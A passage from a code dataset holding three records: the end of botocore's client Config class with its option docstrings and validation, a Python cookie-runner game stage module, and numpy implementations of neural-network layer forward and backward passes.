\". Allowed characters are\n ASCII alphanumerics and ``!$%&'*+-.^_`|~``. All other characters will\n be replaced by a ``-``.\n\n :type connect_timeout: float or int\n :param connect_timeout: The time in seconds till a timeout exception is\n thrown when attempting to make a connection. The default is 60\n seconds.\n\n :type read_timeout: float or int\n :param read_timeout: The time in seconds till a timeout exception is\n thrown when attempting to read from a connection. The default is\n 60 seconds.\n\n :type parameter_validation: bool\n :param parameter_validation: Whether parameter validation should occur\n when serializing requests. The default is True. You can disable\n parameter validation for performance reasons. Otherwise, it's\n recommended to leave parameter validation enabled.\n\n :type max_pool_connections: int\n :param max_pool_connections: The maximum number of connections to\n keep in a connection pool. If this value is not set, the default\n value of 10 is used.\n\n :type proxies: dict\n :param proxies: A dictionary of proxy servers to use by protocol or\n endpoint, e.g.:\n ``{'http': 'foo.bar:3128', 'http://hostname': 'foo.bar:4012'}``.\n The proxies are used on each request.\n\n :type proxies_config: dict\n :param proxies_config: A dictionary of additional proxy configurations.\n Valid keys are:\n\n * ``proxy_ca_bundle`` -- The path to a custom certificate bundle to use\n when establishing SSL/TLS connections with proxy.\n\n * ``proxy_client_cert`` -- The path to a certificate for proxy\n TLS client authentication.\n\n When a string is provided it is treated as a path to a proxy client\n certificate. When a two element tuple is provided, it will be\n interpreted as the path to the client certificate, and the path\n to the certificate key.\n\n * ``proxy_use_forwarding_for_https`` -- For HTTPS proxies,\n forward your requests to HTTPS destinations with an absolute\n URI. We strongly recommend you only use this option with\n trusted or corporate proxies. Value must be boolean.\n\n :type s3: dict\n :param s3: A dictionary of S3 specific configurations.\n Valid keys are:\n\n * ``use_accelerate_endpoint`` -- Refers to whether to use the S3\n Accelerate endpoint. The value must be a boolean. If True, the\n client will use the S3 Accelerate endpoint. If the S3 Accelerate\n endpoint is being used then the addressing style will always\n be virtual.\n\n * ``payload_signing_enabled`` -- Refers to whether or not to SHA256\n sign sigv4 payloads. By default, this is disabled for streaming\n uploads (UploadPart and PutObject).\n\n * ``addressing_style`` -- Refers to the style in which to address\n s3 endpoints. Values must be a string that equals one of:\n\n * ``auto`` -- Addressing style is chosen for user. Depending\n on the configuration of client, the endpoint may be addressed in\n the virtual or the path style. Note that this is the default\n behavior if no style is specified.\n\n * ``virtual`` -- Addressing style is always virtual. The name of the\n bucket must be DNS compatible or an exception will be thrown.\n Endpoints will be addressed as such: ``mybucket.s3.amazonaws.com``\n\n * ``path`` -- Addressing style is always by path. Endpoints will be\n addressed as such: ``s3.amazonaws.com/mybucket``\n\n * ``us_east_1_regional_endpoint`` -- Refers to what S3 endpoint to use\n when the region is configured to be us-east-1. Values must be a\n string that equals:\n\n * ``regional`` -- Use the us-east-1.amazonaws.com endpoint if the\n client is configured to use the us-east-1 region.\n\n * ``legacy`` -- Use the s3.amazonaws.com endpoint if the client is\n configured to use the us-east-1 region. This is the default if\n the configuration option is not specified.\n\n\n :type retries: dict\n :param retries: A dictionary for configuration related to retry behavior.\n Valid keys are:\n\n * ``total_max_attempts`` -- An integer representing the maximum number of\n total attempts that will be made on a single request. This includes\n the initial request, so a value of 1 indicates that no requests\n will be retried. If ``total_max_attempts`` and ``max_attempts``\n are both provided, ``total_max_attempts`` takes precedence.\n ``total_max_attempts`` is preferred over ``max_attempts`` because\n it maps to the ``AWS_MAX_ATTEMPTS`` environment variable and\n the ``max_attempts`` config file value.\n * ``max_attempts`` -- An integer representing the maximum number of\n retry attempts that will be made on a single request. For\n example, setting this value to 2 will result in the request\n being retried at most two times after the initial request. Setting\n this value to 0 will result in no retries ever being attempted after\n the initial request. If not provided, the number of retries will\n default to the value specified in the service model, which is\n typically four retries.\n * ``mode`` -- A string representing the type of retry mode botocore\n should use. Valid values are:\n\n * ``legacy`` - The pre-existing retry behavior.\n\n * ``standard`` - The standardized set of retry rules. This will also\n default to 3 max attempts unless overridden.\n\n * ``adaptive`` - Retries with additional client side throttling.\n\n :type client_cert: str, (str, str)\n :param client_cert: The path to a certificate for TLS client authentication.\n\n When a string is provided it is treated as a path to a client\n certificate to be used when creating a TLS connection.\n\n If a client key is to be provided alongside the client certificate the\n client_cert should be set to a tuple of length two where the first\n element is the path to the client certificate and the second element is\n the path to the certificate key.\n\n :type inject_host_prefix: bool\n :param inject_host_prefix: Whether host prefix injection should occur.\n\n Defaults to True.\n\n Setting this to False disables the injection of operation parameters\n into the prefix of the hostname. This is useful for clients providing\n custom endpoints that should not have their host prefix modified.\n\n :type use_dualstack_endpoint: bool\n :param use_dualstack_endpoint: Setting to True enables dualstack\n endpoint resolution.\n\n Defaults to None.\n\n :type use_fips_endpoint: bool\n :param use_fips_endpoint: Setting to True enables fips\n endpoint resolution.\n\n Defaults to None.\n\n :type ignore_configured_endpoint_urls: bool\n :param ignore_configured_endpoint_urls: Setting to True disables use\n of endpoint URLs provided via environment variables and\n the shared configuration file.\n\n Defaults to None.\n\n :type tcp_keepalive: bool\n :param tcp_keepalive: Enables the TCP Keep-Alive socket option used when\n creating new connections if set to True.\n\n Defaults to False.\n\n :type request_min_compression_size_bytes: int\n :param request_min_compression_bytes: The minimum size in bytes that a\n request body should be to trigger compression. All requests with streaming\n input that don't contain the `requiresLength` trait will be compressed\n regardless of this setting.\n\n Defaults to None.\n\n :type disable_request_compression: bool\n :param disable_request_compression: Disables request body compression if\n set to True.\n\n Defaults to None.\n \"\"\"\n\n OPTION_DEFAULTS = OrderedDict(\n [\n ('region_name', None),\n ('signature_version', None),\n ('user_agent', None),\n ('user_agent_extra', None),\n ('user_agent_appid', None),\n ('connect_timeout', DEFAULT_TIMEOUT),\n ('read_timeout', DEFAULT_TIMEOUT),\n ('parameter_validation', True),\n ('max_pool_connections', MAX_POOL_CONNECTIONS),\n ('proxies', None),\n ('proxies_config', None),\n ('s3', None),\n ('retries', None),\n ('client_cert', None),\n ('inject_host_prefix', True),\n ('endpoint_discovery_enabled', None),\n ('use_dualstack_endpoint', None),\n ('use_fips_endpoint', None),\n ('ignore_configured_endpoint_urls', None),\n ('defaults_mode', None),\n ('tcp_keepalive', None),\n ('request_min_compression_size_bytes', None),\n ('disable_request_compression', None),\n ]\n )\n\n NON_LEGACY_OPTION_DEFAULTS = {\n 'connect_timeout': None,\n }\n\n def __init__(self, *args, **kwargs):\n self._user_provided_options = self._record_user_provided_options(\n args, kwargs\n )\n\n # Merge the user_provided options onto the default options\n config_vars = copy.copy(self.OPTION_DEFAULTS)\n defaults_mode = self._user_provided_options.get(\n 'defaults_mode', 'legacy'\n )\n if defaults_mode != 'legacy':\n config_vars.update(self.NON_LEGACY_OPTION_DEFAULTS)\n config_vars.update(self._user_provided_options)\n\n # Set the attributes based on the config_vars\n for key, value in config_vars.items():\n setattr(self, key, value)\n\n # Validate the s3 options\n self._validate_s3_configuration(self.s3)\n\n self._validate_retry_configuration(self.retries)\n\n def _record_user_provided_options(self, args, kwargs):\n option_order = list(self.OPTION_DEFAULTS)\n user_provided_options = {}\n\n # Iterate through the kwargs passed through to the constructor and\n # map valid keys to the dictionary\n for key, value in kwargs.items():\n if key in self.OPTION_DEFAULTS:\n user_provided_options[key] = value\n # The key must exist in the available options\n else:\n raise TypeError(f\"Got unexpected keyword argument '{key}'\")\n\n # The number of args should not be longer than the allowed\n # options\n if len(args) > len(option_order):\n raise TypeError(\n f\"Takes at most {len(option_order)} arguments ({len(args)} given)\"\n )\n\n # Iterate through the args passed through to the constructor and map\n # them to appropriate keys.\n for i, arg in enumerate(args):\n # If it a kwarg was specified for the arg, then error out\n if option_order[i] in user_provided_options:\n raise TypeError(\n f\"Got multiple values for keyword argument '{option_order[i]}'\"\n )\n user_provided_options[option_order[i]] = arg\n\n return user_provided_options\n\n def _validate_s3_configuration(self, s3):\n if s3 is not None:\n addressing_style = s3.get('addressing_style')\n if addressing_style not in ['virtual', 'auto', 'path', None]:\n raise InvalidS3AddressingStyleError(\n s3_addressing_style=addressing_style\n )\n\n def _validate_retry_configuration(self, retries):\n valid_options = ('max_attempts', 'mode', 'total_max_attempts')\n valid_modes = ('legacy', 'standard', 'adaptive')\n if retries is not None:\n for key, value in retries.items():\n if key not in valid_options:\n raise InvalidRetryConfigurationError(\n retry_config_option=key,\n valid_options=valid_options,\n )\n if key == 'max_attempts' and value < 0:\n raise InvalidMaxRetryAttemptsError(\n provided_max_attempts=value,\n min_value=0,\n )\n if key == 'total_max_attempts' and value < 1:\n raise InvalidMaxRetryAttemptsError(\n provided_max_attempts=value,\n min_value=1,\n )\n if key == 'mode' and value not in valid_modes:\n raise InvalidRetryModeError(\n provided_retry_mode=value,\n valid_modes=valid_modes,\n )\n\n def merge(self, other_config):\n \"\"\"Merges the config object with another config object\n\n This will merge in all non-default values from the provided config\n and return a new config object\n\n :type other_config: botocore.config.Config\n :param other config: Another config object to merge with. The values\n in the provided config object will take precedence in the merging\n\n :returns: A config object built from the merged values of both\n config objects.\n \"\"\"\n # Make a copy of the current attributes in the config object.\n config_options = copy.copy(self._user_provided_options)\n\n # Merge in the user provided options from the other config\n config_options.update(other_config._user_provided_options)\n\n # Return a new config object with the merged properties.\n return Config(**config_options)\n", "sub_path": "botocore/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 15129, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "botocore.compat.OrderedDict", "line_number": 225, "usage_type": "call"}, {"api_name": "botocore.endpoint.DEFAULT_TIMEOUT", "line_number": 232, "usage_type": "name"}, {"api_name": "botocore.endpoint.DEFAULT_TIMEOUT", "line_number": 233, "usage_type": "name"}, {"api_name": "botocore.endpoint.MAX_POOL_CONNECTIONS", "line_number": 235, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 263, "usage_type": "call"}, {"api_name": "botocore.exceptions.InvalidS3AddressingStyleError", "line_number": 316, "usage_type": "call"}, {"api_name": "botocore.exceptions.InvalidRetryConfigurationError", "line_number": 326, "usage_type": "call"}, {"api_name": "botocore.exceptions.InvalidMaxRetryAttemptsError", "line_number": 331, "usage_type": "call"}, {"api_name": "botocore.exceptions.InvalidMaxRetryAttemptsError", "line_number": 336, "usage_type": "call"}, {"api_name": "botocore.exceptions.InvalidRetryModeError", "line_number": 341, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 360, "usage_type": "call"}]}
+{"seq_id": "548541204", "text": "import random\nimport json\nimport os\nimport time\n\nfrom cookie import *\nfrom back_ground import *\nfrom ground import *\nfrom obstacle import *\nfrom item import *\nfrom score import *\nimport game_framework\nimport title_state\nimport result_state\nimport stage1_select\nimport stage2_select\nimport stage3_select\nimport stage4_select\n\nname = \"MainState\"\n\ncookie = None\nbackground = None\nnomal_fork = None\nnomal_thorn = None\nspecial_fork = None\ndouble_thorn = None\nboard = None\nitem_jelly = None\nhp_jelly = None\nobject = []\nranking_data = []\ncurrent_time = 0.0\n\ndef collide(a, b):\n left_a, bottom_a, right_a, top_a = a.get_bb()\n left_b, bottom_b, right_b, top_b = b.get_bb()\n\n if left_a > right_b: return False\n if right_a < left_b: return False\n if top_a < bottom_b: return False\n if bottom_a > top_b: return False\n\n return True\n\ndef get_frame_time():\n\n global current_time\n\n frame_time = get_time() - current_time\n current_time += frame_time\n return frame_time\n\ndef enter():\n global cookie, background, ground, nomal_fork, nomal_thorn, special_fork, double_thorn, board, \\\n start, score_jelly, hp_jelly, font, objects, score, brave_cookie, ginger_brave_cookie, f, ranking_data\n\n cookie = stage1_select.get_cookie\n brave_cookie = stage1_select.brave_cookie_select\n ginger_brave_cookie = stage1_select.ginger_brave_cookie_select\n background = Stage1_Background(800, 600)\n ground = Stage1_Ground(800, 150)\n score = Score()\n board = Stage1_Board().create()\n nomal_fork = Stage1_Nomal_Fork().create()\n nomal_thorn = Stage1_Nomal_Thorn().create()\n special_fork = Stage1_Special_Fork().create()\n double_thorn = Stage1_Double_Thorn().create()\n score_jelly = Stage1_Score_Jelly().create()\n hp_jelly = Stage1_Hp_Jelly().create()\n objects = [nomal_fork, special_fork, nomal_thorn, double_thorn, score_jelly, hp_jelly, board]\n font = load_font('Resource\\\\ENCR10B.TTF')\n start = time.time()\n\n f = open('ranking_data.txt', 'r')\n ranking_data = json.load(f)\n f.close()\n\ndef exit():\n global cookie, background, ground, nomal_fork, nomal_thorn, special_fork, double_thorn, board, start, \\\n score_jelly, hp_jelly, objects, score\n del(cookie)\n del(background)\n del(ground)\n\n for list in objects:\n for dict in list:\n list.remove(dict)\n del(dict)\n del(list)\n\n end = time.time()\n\n print(\"Stage1 Clear Time : \", (end - start))\n\ndef pause():\n pass\n\n\ndef resume():\n pass\n\n\ndef handle_events():\n global cookie\n events = get_events()\n\n for event in events:\n if event.type == SDL_QUIT:\n game_framework.quit()\n\n elif event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:\n game_framework.change_state(title_state)\n\n elif event.type == SDL_KEYDOWN and event.key == SDLK_2:\n game_framework.change_state(stage2_select)\n\n elif event.type == SDL_KEYDOWN and event.key == SDLK_3:\n game_framework.change_state(stage3_select)\n\n elif event.type == SDL_KEYDOWN and event.key == SDLK_4:\n game_framework.change_state(stage4_select)\n\n else:\n cookie.handle_events(event)\n\ndef update():\n global cookie, brave_cookie, ginger_brave_cookie, background, ground, nomal_fork, nomal_thorn, special_fork, double_thorn, board, \\\n score_jelly, hp_jelly, objects, score\n\n frame_time = get_frame_time()\n background.update(frame_time)\n ground.update(frame_time)\n score.stage1_score()\n cookie.update(frame_time)\n\n if brave_cookie == True and cookie.hp <= 0:\n cookie = Ginger_Brave_Cookie()\n if ginger_brave_cookie == True and cookie.hp <= 0:\n cookie = Brave_Cookie()\n\n for list in objects:\n for dict in list:\n dict.update(frame_time)\n if collide(cookie, dict):\n if list == score_jelly:\n list.remove(dict)\n cookie.scoreSound(dict)\n elif list == hp_jelly:\n list.remove(dict)\n cookie.heal(dict)\n elif list == board:\n for dict in list:\n dict.state = \"None\"\n else:\n cookie.state = \"Collide\"\n\n if background.map_size >= 55 and cookie.y == 200:\n game_framework.change_state(stage2_select)\n elif background.map_size >= 55 and cookie.y == 250:\n game_framework.change_state(stage3_select)\n if (Brave_Cookie.hp <= 0) and (Ginger_Brave_Cookie.hp <= 0):\n game_framework.change_state(result_state)\n\ndef draw():\n global cookie, background, ground, objects, score\n clear_canvas()\n background.draw()\n ground.draw()\n\n for list in objects:\n for dict in list:\n dict.draw()\n\n font.draw(100, 550, 'Score : %3.2d' % score.score, (255, 255, 255))\n cookie.draw()\n\n delay(0.03)\n update_canvas()", "sub_path": "stage1.py", "file_name": "stage1.py", "file_ext": "py", "file_size_in_byte": 4950, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "stage1_select.get_cookie", "line_number": 58, "usage_type": "attribute"}, {"api_name": "stage1_select.brave_cookie_select", "line_number": 59, "usage_type": "attribute"}, {"api_name": "stage1_select.ginger_brave_cookie_select", "line_number": 60, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 73, "usage_type": "call"}, {"api_name": "json.load", "line_number": 76, "usage_type": "call"}, {"api_name": "time.time", "line_number": 92, "usage_type": "call"}, {"api_name": "game_framework.quit", "line_number": 110, "usage_type": "call"}, {"api_name": "game_framework.change_state", "line_number": 113, "usage_type": "call"}, {"api_name": "game_framework.change_state", "line_number": 116, "usage_type": "call"}, {"api_name": "game_framework.change_state", "line_number": 119, "usage_type": "call"}, {"api_name": "game_framework.change_state", "line_number": 122, "usage_type": "call"}, {"api_name": "cookie.handle_events", "line_number": 125, "usage_type": "call"}, {"api_name": "ground.update", "line_number": 133, "usage_type": "call"}, {"api_name": "score.stage1_score", "line_number": 134, "usage_type": "call"}, {"api_name": "cookie.update", "line_number": 135, "usage_type": "call"}, {"api_name": "cookie.hp", "line_number": 137, "usage_type": "attribute"}, {"api_name": "cookie.hp", "line_number": 139, "usage_type": "attribute"}, {"api_name": "cookie.scoreSound", "line_number": 148, "usage_type": "call"}, {"api_name": "cookie.heal", "line_number": 151, "usage_type": "call"}, {"api_name": "cookie.state", "line_number": 156, "usage_type": "attribute"}, {"api_name": "cookie.y", "line_number": 158, "usage_type": "attribute"}, {"api_name": "game_framework.change_state", "line_number": 159, "usage_type": "call"}, {"api_name": "cookie.y", "line_number": 160, "usage_type": "attribute"}, {"api_name": "game_framework.change_state", "line_number": 161, "usage_type": "call"}, {"api_name": "game_framework.change_state", "line_number": 163, "usage_type": "call"}, {"api_name": "ground.draw", "line_number": 169, "usage_type": "call"}, {"api_name": "score.score", "line_number": 175, "usage_type": "attribute"}, {"api_name": "cookie.draw", "line_number": 176, "usage_type": "call"}]}
+{"seq_id": "312266098", "text": "import numpy as np\nfrom scipy.signal import fftconvolve, convolve\nfrom itertools import product\n\ndef affine_forward(x, w, b):\n \"\"\"\n Computes the forward pass for an affine (fully-connected) layer.\n\n The input x has shape (N, d_1, ..., d_k) and contains a minibatch of N\n examples, where each example x[i] has shape (d_1, ..., d_k). We will\n reshape each input into a vector of dimension D = d_1 * ... * d_k, and\n then transform it to an output vector of dimension M.\n\n Inputs:\n - x: A numpy array containing input data, of shape (N, d_1, ..., d_k)\n - w: A numpy array of weights, of shape (D, M)\n - b: A numpy array of biases, of shape (M,)\n\n Returns a tuple of:\n - out: output, of shape (N, M)\n - cache: (x, w, b)\n \"\"\"\n cache = (x, w, b)\n x = x.reshape(x.shape[0], -1) # NxD\n out = x.dot(w) + b\n return out, cache\n\n\ndef affine_backward(dout, cache):\n \"\"\"\n Computes the backward pass for an affine layer.\n\n Inputs:\n - dout: Upstream derivative, of shape (N, M)\n - cache: Tuple of:\n - x: Input data, of shape (N, d_1, ... d_k)\n - w: Weights, of shape (D, M)\n - b: biases, of shape (M,\n\n Returns a tuple of:\n - dx: Gradient with respect to x, of shape (N, d1, ..., d_k)\n - dw: Gradient with respect to w, of shape (D, M)\n - db: Gradient with respect to b, of shape (M,)\n \"\"\"\n x, w, b = cache\n\n dx = dout.dot(w.T).reshape(x.shape)\n dw = x.reshape(x.shape[0], -1).T.dot(dout)\n db = dout.sum(axis=0)\n\n return dx, dw, db\n\n\ndef relu_forward(x):\n \"\"\"\n Computes the forward pass for a layer of rectified linear units (ReLUs).\n\n Input:\n - x: Inputs, of any shape\n\n Returns a tuple of:\n - out: Output, of the same shape as x\n - cache: x\n \"\"\"\n out = np.maximum(0, x)\n cache = x\n return out, cache\n\n\ndef relu_backward(dout, cache):\n \"\"\"\n Computes the backward pass for a layer of rectified linear units (ReLUs).\n\n Input:\n - dout: Upstream derivatives, of any shape\n - cache: Input x, of same shape as dout\n\n Returns:\n - dx: Gradient with respect to x\n \"\"\"\n dx, x = None, cache\n dout[np.where(x <= 0.)] = 0.\n dx = dout\n\n return dx\n\n\ndef batchnorm_forward(x, gamma, beta, bn_param):\n \"\"\"\n Forward pass for batch normalization.\n\n During training the sample mean and (uncorrected) sample variance are\n computed from minibatch statistics and used to normalize the incoming data.\n During training we also keep an exponentially decaying running mean of the mean\n and variance of each feature, and these averages are used to normalize data\n at test-time.\n\n At each timestep we update the running averages for mean and variance using\n an exponential decay based on the momentum parameter:\n\n running_mean = momentum * running_mean + (1 - momentum) * sample_mean\n running_var = momentum * running_var + (1 - momentum) * sample_var\n\n Note that the batch normalization paper suggests a different test-time\n behavior: they compute sample mean and variance for each feature using a\n large number of training images rather than using a running average. For\n this implementation we have chosen to use running averages instead since\n they do not require an additional estimation step; the torch7 implementation\n of batch normalization also uses running averages.\n\n Input:\n - x: Data of shape (N, D)\n - gamma: Scale parameter of shape (D,)\n - beta: Shift parameter of shape (D,)\n - bn_param: Dictionary with the following keys:\n - mode: 'train' or 'test'; required\n - eps: Constant for numeric stability\n - momentum: Constant for running mean / variance.\n - running_mean: Array of shape (D,) giving running mean of features\n - running_var Array of shape (D,) giving running variance of features\n\n Returns a tuple of:\n - out: of shape (N, D)\n - cache: A tuple of values needed in the backward pass\n \"\"\"\n mode = bn_param['mode']\n eps = bn_param.get('eps', 1e-5)\n momentum = bn_param.get('momentum', 0.9)\n\n N, D = x.shape\n running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))\n running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))\n\n out, cache = None, None\n if mode == 'train':\n var = np.var(x, axis=0)\n mean = x.mean(axis=0)\n x_shift = x - mean\n x_norm = x_shift/np.sqrt(var + eps)\n\n out = gamma*x_norm\n out += beta\n\n scale = (1. - momentum)\n running_mean *= momentum\n running_mean += scale*mean\n\n running_var *= momentum\n running_var += scale*var\n\n cache = (x_shift, x_norm, var+eps, gamma)\n # cache = (x, mean, var+eps, gamma)\n\n elif mode == 'test':\n out = (x - running_mean)/np.sqrt(running_var + eps)\n out *= gamma\n out += beta\n\n else:\n raise ValueError('Invalid forward batchnorm mode \"%s\"' % mode)\n\n # Store the updated running means back into bn_param\n bn_param['running_mean'] = running_mean\n bn_param['running_var'] = running_var\n\n return out, cache\n\n\ndef batchnorm_backward(dout, cache):\n \"\"\"\n Backward pass for batch normalization.\n\n For this implementation, you should write out a computation graph for\n batch normalization on paper and propagate gradients backward through\n intermediate nodes.\n\n Inputs:\n - dout: Upstream derivatives, of shape (N, D)\n - cache: Variable of intermediates from batchnorm_forward.\n\n Returns a tuple of:\n - dx: Gradient with respect to inputs x, of shape (N, D)\n - dgamma: Gradient with respect to scale parameter gamma, of shape (D,)\n - dbeta: Gradient with respect to shift parameter beta, of shape (D,)\n \"\"\"\n\n # I just did the alt version...vanilla was dumb\n\n return batchnorm_backward_alt(dout, cache)\n\n\ndef batchnorm_backward_alt(dout, cache):\n \"\"\"\n Alternative backward pass for batch normalization.\n\n For this implementation you should work out the derivatives for the batch\n normalizaton backward pass on paper and simplify as much as possible. You\n should be able to derive a simple expression for the backward pass.\n\n Note: This implementation should expect to receive the same cache variable\n as batchnorm_backward, but might not use all of the values in the cache.\n\n Inputs / outputs: Same as batchnorm_backward\n \"\"\"\n x_shift, x_norm, var_eps, gamma = cache\n dx_norm = gamma*dout\n\n dgamma = np.einsum('ij,ij->j', dout, x_norm)\n dbeta = np.sum(dout, axis=0)\n\n dx = dx_norm - np.mean(dx_norm, axis=0)\n dx -= x_shift*np.einsum('ij,ij->j', dx_norm, x_shift)/(var_eps*dx_norm.shape[0])\n dx /= np.sqrt(var_eps)\n\n return dx, dgamma, dbeta\n\n\ndef dropout_forward(x, dropout_param):\n \"\"\"\n Performs the forward pass for (inverted) dropout.\n\n Inputs:\n - x: Input data, of any shape\n - dropout_param: A dictionary with the following keys:\n - p: Dropout parameter. We drop each neuron output with probability p.\n - mode: 'test' or 'train'. If the mode is train, then perform dropout;\n if the mode is test, then just return the input.\n - seed: Seed for the random number generator. Passing seed makes this\n function deterministic, which is needed for gradient checking but not in\n real networks.\n\n Outputs:\n - out: Array of the same shape as x.\n - cache: A tuple (dropout_param, mask). In training mode, mask is the dropout\n mask that was used to multiply the input; in test mode, mask is None.\n \"\"\"\n p, mode = dropout_param['p'], dropout_param['mode']\n if 'seed' in dropout_param:\n np.random.seed(dropout_param['seed'])\n\n mask = None\n out = None\n\n if mode == 'train':\n mask = (np.random.rand(*x.shape) < p)/p\n out = x*mask\n elif mode == 'test':\n out = x\n\n cache = (dropout_param, mask)\n out = out.astype(x.dtype, copy=False)\n\n return out, cache\n\n\ndef dropout_backward(dout, cache):\n \"\"\"\n Perform the backward pass for (inverted) dropout.\n\n Inputs:\n - dout: Upstream derivatives, of any shape\n - cache: (dropout_param, mask) from dropout_forward.\n \"\"\"\n dropout_param, mask = cache\n mode = dropout_param['mode']\n\n dx = None\n if mode == 'train':\n dx = mask*dout\n elif mode == 'test':\n dx = dout\n return dx\n\n\ndef flip_ndarray(x):\n \"\"\" Reverse the positions of the entries of the input array along all of its axes.\n\n Parameters\n ----------\n x : numpy.ndarray\n\n Returns\n -------\n out : numpy.ndarray\n A view of x with all of its axes reversed. Since a view is returned, this operation is O(1).\n\n Example\n ------\n x = array([[1, 2, 3],\n [6, 5, 6]])\n flip_ndarray(x))\n >> array([[6, 5, 4],\n [3, 2, 1]])\"\"\"\n loc = tuple(slice(None, None, -1) for i in xrange(x.ndim))\n return x[loc]\n\n\ndef nd_convolve(dat, conv_kernel, stride, outshape=None):\n \"\"\" Perform a convolution of two ndarrays, using a specified stride.\n\n Parameters\n ----------\n data : numpy.ndarray\n Array to be convolved over.\n kernel : numpy.ndarray\n Kernel used to perform convolution.\n stride : Union[Iterable[int, ...], Dict[int, int], int]\n Step sizes used while sliding the kernel during the convolution.\n - If a dictionary is provided, then it is used to map (axis-index -> stride-value). If an\n axis is not specified in the dictionary keys, then a stride of 1 is used along that axis.\n - If an iterable is provided, it must provide an explicit stride value for each axis (in order\n of ascending axis-index).\n - If a single stride value is specified, that value is used for every axis.\n\n outshape : Optional[Tuple[int, ...]]\n Provide the known output shape of the convolution, allowing the function to bypass\n sanity checks and some initial computations.\n\n Returns\n -------\n out : numpy.ndarray\n An array of the resulting convolution.\n \"\"\"\n if np.max(dat.shape) >= 500:\n conv = fftconvolve\n else:\n conv = convolve\n\n if type(stride) is dict:\n stride_gen = (stride.get(key, 1) for key in range(dat.ndim))\n elif hasattr(stride, '__iter__'):\n stride_gen = stride\n else:\n stride_gen = (stride for i in range(dat.ndim))\n stride = np.fromiter(stride_gen, dtype=int)\n\n if outshape is None:\n outshape = get_outshape(dat.shape, conv_kernel.shape, stride)\n\n full_conv = conv(dat, conv_kernel, mode='valid')\n\n if np.all(stride == 1):\n return full_conv\n\n # all index positions to down-sample the convolution, given stride > 1\n all_pos = zip(*product(*(stride[n]*np.arange(i) for n,i in enumerate(outshape))))\n out = np.zeros(outshape, dtype=dat.dtype)\n out.flat = full_conv[all_pos]\n return out\n\n\ndef get_outshape(dat_shape, kernel_shape, stride):\n \"\"\" Returns the shape of the ndarray resulting from the convolution, using specified stride,\n of two ndarrays whose shapes are specified.\n\n Parameters\n ----------\n dat_shape : Iterable[int, ...]\n Shape of array to be convolved over.\n kernel_shape : Iterable[int, ...]\n Shape of kernel used to perform convolution.\n stride : Union[int, Iterable[int, ...]] ( > 0)\n Step size used while sliding the kernel during the convolution.\n\n Returns\n -------\n out : numpy.ndarray([int, ...])\n Shape of the array resulting from the convolution.\"\"\"\n\n dat_shape = np.array(dat_shape)\n kernel_shape = np.array(kernel_shape)\n\n if hasattr(stride, '__iter__'):\n stride = np.fromiter(stride, dtype=float)\n assert len(stride) == len(dat_shape), 'The stride iterable must provide a stride value for each dat axis.'\n else:\n stride = float(stride)\n assert len(dat_shape) == len(kernel_shape), \"kernel and data must have same number of dimensions\"\n\n outshape = (dat_shape-kernel_shape)/stride+1.\n for num in outshape:\n assert num.is_integer(), num\n outshape = np.rint(outshape).astype(int)\n\n return outshape\n\n\ndef padder(dat, pad, skip_axes=[0]):\n \"\"\" Returns an array padded with zeros with specified depth on both sides of each axis. A list of\n axes can be specified, which will not receive any padding.\n\n Parameters\n ----------\n dat : numpy.ndarray\n Array to be padded\n pad : int ( >= 0)\n Padding depth to be used on each end of a padding axis.\n skip_axes : Union[int, Iterable[int, ...]]\n The indices corresponding to axes that will not be padded.\n\n Returns\n -------\n out : numpy.ndarray\n Array padded with zeros.\"\"\"\n assert pad >= 0 and type(pad) == int\n if pad == 0:\n return dat\n\n if type(skip_axes) == int:\n skip_axes = [skip_axes]\n assert hasattr(skip_axes, '__iter__')\n padding = [(pad, pad) for i in xrange(dat.ndim)]\n\n for ax in skip_axes:\n padding[ax] = (0, 0)\n\n return np.pad(dat, padding, mode='constant').astype(dat.dtype)\n\n\ndef conv_forward_naive(x, w, b, conv_param):\n \"\"\"\n A naive implementation of the forward pass for a convolutional layer.\n\n The input consists of N data points, each with C channels, height H and width\n W. We convolve each input with F different filters, where each filter spans\n all C channels and has height HH and width HH.\n\n Input:\n - x: Input data of shape (N, C, H, W)\n - w: Filter weights of shape (F, C, HH, WW)\n - b: Biases, of shape (F,)\n - conv_param: A dictionary with the following keys:\n - 'stride': The number of pixels between adjacent receptive fields in the\n horizontal and vertical directions.\n - 'pad': The number of pixels that will be used to zero-pad the input.\n\n Returns a tuple of:\n - out: Output data, of shape (N, F, H', W') where H' and W' are given by\n H' = 1 + (H + 2 * pad - HH) / stride\n W' = 1 + (W + 2 * pad - WW) / stride\n - cache: (x, w, b, conv_param)\n \"\"\"\n\n pad_x = padder(x, conv_param['pad'], skip_axes=[0, 1])\n conv_out_shape = get_outshape(pad_x[0].shape, w[0].shape, conv_param['stride'])\n out = np.zeros((x.shape[0], w.shape[0], conv_out_shape[-2], conv_out_shape[-1]))\n\n for nk, kernel in enumerate(w):\n # note: we are actually computing a correlation, not a convolution\n conv_kernel = flip_ndarray(kernel)\n for nd, dat in enumerate(pad_x):\n out[nd, nk, :, :] = nd_convolve(dat, conv_kernel, conv_param['stride'], conv_out_shape)\n out[:, nk:nk+1, :, :] += b[nk]\n\n cache = (x, w, b, conv_param)\n return out, cache\n\n\ndef conv_backward_naive(dout, cache):\n \"\"\"\n A naive implementation of the backward pass for a convolutional layer.\n\n Inputs:\n - dout: Upstream derivatives.\n - cache: A tuple of (x, w, b, conv_param) as in conv_forward_naive\n\n Returns a tuple of:\n - dx: Gradient with respect to x\n - dw: Gradient with respect to w\n - db: Gradient with respect to b\n \"\"\"\n\n x, w, b, conv_param = cache\n\n dx = np.zeros_like(x, dtype=x.dtype)\n dw = np.zeros_like(w, dtype=w.dtype)\n db = np.sum(dout, axis=(0, 2, 3))\n\n pad = conv_param['pad']\n stride = conv_param['stride']\n\n npad = np.array([0]+[pad for i in xrange(x[0].ndim-1)])\n outshape = (np.array(x[0].shape)-np.array(w[0].shape)+2.*npad)/float(stride)+1.\n outshape = np.round(outshape).astype(int)\n\n # all positions to place the kernel\n all_pos = list(product(*[stride*np.arange(i) for i in outshape]))\n 